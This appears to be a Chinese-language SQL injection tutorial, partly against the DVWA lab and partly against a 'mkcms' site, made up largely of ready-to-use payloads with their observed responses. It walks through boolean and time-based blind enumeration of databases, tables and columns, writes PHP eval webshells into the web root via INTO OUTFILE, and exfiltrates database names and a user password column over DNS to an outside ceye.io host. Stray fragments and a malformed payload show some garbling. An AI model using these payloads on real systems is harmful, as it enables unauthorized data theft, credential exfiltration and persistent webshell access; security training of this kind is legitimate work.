1
2
3
4
5
6
7

substr()  substr(string string,num start,num length);
string为字符串；start为起始位置；length为长度。
count() 计数函数 count()函数是用来统计表中记录的一个函数,返回匹配条件的行数
select count(*) from mysql.user where id =1
ascii()返回对应字符的十进制值
length() 返回字符串长度
left()  left(str, length)，即：left(被截取字符串， 截取长度)

1
2
3
4

1' or 1=1#
1' or 1=2#
如果注入点在order by后面，那么则可以使用判断语句来构造报错。
select 1 from te order by if(1,1,(select 1 union select 2)) limit 0,3;

1
2
3
4
5
6
7
8
9
10
11
12
13

数据库长度：1' and length(database())=4 #
数据库名：
二分法猜解表：通过与ascii码对照，一位一位的得出字符
1' and ascii(substr(database(),1,1))>97# 页面返回存在
1’ and 1

1' and ascii(substr(database(),1,1))>100# 页面返回不存在

1' and ascii(substr(database(),1,1))<103# 页面返回存在

1' and ascii(substr(database(),1,1))<100# 页面返回不存在
最终发现：数据库名的第一位字符的ascii码值为 100，则得到字母d
重复上述步骤，就可以猜解出完整的数据库名dvwa了

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25

1' and (select count(table_name) from information_schema.tables where table_schema=database())=1# 显示不存在

1' and (select count(table_name) from information_schema.tables where table_schema=database())=2 # 显示存在
得知有 2 个表，继续使用length()函数来猜测表名的长度：
1' and length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=1# 显示不存在
User
guestbook
1' and length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=2 # 显示不存在
···
1' and length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=9 # 显示存在
说明第一个表名长度为 9。
1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),,1))=97 # 显示存在
User
U
99

1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))<122 # 显示存在
1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))<109 # 显示存在

1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))<103 # 显示不存在

1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>103 # 显示不存在
说明第一个表的名字的第一个字符为小写字母g。
…
重复上述步骤，即可猜解出两个表名guestbook、users。

1
2
3
4
5
6
7
8
9
10
11
12

1' and (select count(column_name) from information_schema.columns where table_name= 'users')=1 # 显示不存在

…

1' and (select count(column_name) from information_schema.columns where table_name= 'users')=8 # 显示存在
说明users表有 8 个字段。
接着挨个猜解字段名长度：
1' and length(substr((select column_name from information_schema.columns where table_name= 'users' limit 0,1),1))=1 # 显示不存在
…
1' and length(substr((select column_name from information_schema.columns where table_name= 'users' limit 0,1),1))=7 # 显示存在
说明users表的第一个字段为 7 个字符长度。
采用二分法，即可猜解出所有字段名。

1

同样采用二分法

1
2

1' and sleep(5) #感觉到明显延迟；
1 and sleep(5) #没有延迟；

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21

首先猜解数据名的长度
1' and if(length(database())=1,sleep(5),1) # 没有延迟

1' and if(length(database())=2,sleep(5),1) # 没有延迟

1' and if(length(database())=3,sleep(5),1) # 没有延迟

1' and if(length(database())=4,sleep(5),1) # 明显延迟

If函数 IF(expr1,expr2,expr3)，如果expr1的值为true，则返回expr2的值，如果expr1的值为false，则返回expr3的值。
说明数据库名长度为 4 个字符。
接着采用二分法猜解数据库名：
1' and if(ascii(substr(database(),1,1))>97,sleep(5),1)# 明显延迟
…

1' and if(ascii(substr(database(),1,1))<100,sleep(5),1)# 没有延迟

1' and if(ascii(substr(database(),1,1))>100,sleep(5),1)# 没有延迟
说明数据库名的第一个字符为小写字母d。
…
重复上述步骤，即可猜解出数据库名

1
2
3
4
5
6
7
8
9
10
11
12
13

首先猜解数据库中表的数量：
1' and if((select count(table_name) from information_schema.tables where table_schema=database() )=1,sleep(5),1)# 没有延迟

1' and if((select count(table_name) from information_schema.tables where table_schema=database() )=2,sleep(5),1)# 明显延迟
说明数据库中有两个表。
接着挨个猜解表名：
1' and if(length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=1,sleep(5),1) # 没有延迟

…

1' and if(length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=9,sleep(5),1) # 明显延迟
说明第一个表名的长度为 9 个字符。
采用二分法即可猜解出表名。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15

首先猜解表中字段的数量：
1' and if((select count(column_name) from information_schema.columns where table_name= ’users’)=1,sleep(5),1)# 没有延迟

…

1' and if((select count(column_name) from information_schema.columns where table_name= ’users’)=8,sleep(5),1)# 明显延迟
说明users表中有 8 个字段。
接着挨个猜解字段名：
1' and if(length(substr((select column_name from information_schema.columns where table_name= ’users’ limit 0,1),1))=1,sleep(5),1) # 没有延迟

…

1' and if(length(substr((select column_name from information_schema.columns where table_name= ’users’ limit 0,1),1))=7,sleep(5),1) # 明显延迟
说明users表的第一个字段长度为 7 个字符。
采用二分法即可猜解出各个字段名。

1

同样采用二分法。

1
2

知道物理路径，且有MYSQL的ROOT权限
1' union select "<?php @eval($_GET['xxx']) ?>",2 into outfile 'C:\\phpStudy\\WWW\\123.php'#

1
2
3
4
5

1.
test' and if((select load_file(concat('\\\\',(select database()),'.fz0bj5.ceye.io\\abc'))),1,1)#
test' and if((select load_file(concat('\\\\',(select user()),'.fz0bj5.ceye.io\\abc'))),1,1)#
然后查看ceye，成功获取到了数据库名称
对于表段，由于load_file()一次只能传输一条数据，所以查询的时候需要使用limit来一个一个的解析。

1
2
3
4
5
6
7
8

2.查表名
test' and if((select load_file(concat('\\\\',(select table_name from information_schema.tables where table_schema='mkcms' limit 0,1),'.fz0bj5.ceye.io\\abc'))),1,1)#
3.查字段
test' and if((select load_file(concat('\\\\',(select column_name from information_schema.columns where table_name='mkcms_user' limit 0,1),'.fz0bj5.ceye.io\\abc'))),1,1)#
4.查字段值
test' and if((select load_file(concat('\\\\',(select u_password from mkcms_user limit 0,1),'.fz0bj5.ceye.io\\abc'))),1,1)#
5.导出webshell（知道物理路径且Mysql为root权限）
 test' union select "<?php @eval($_POST['wade']); ?>" into outfile 'C:\\phpstudy\\www\\wade.php'#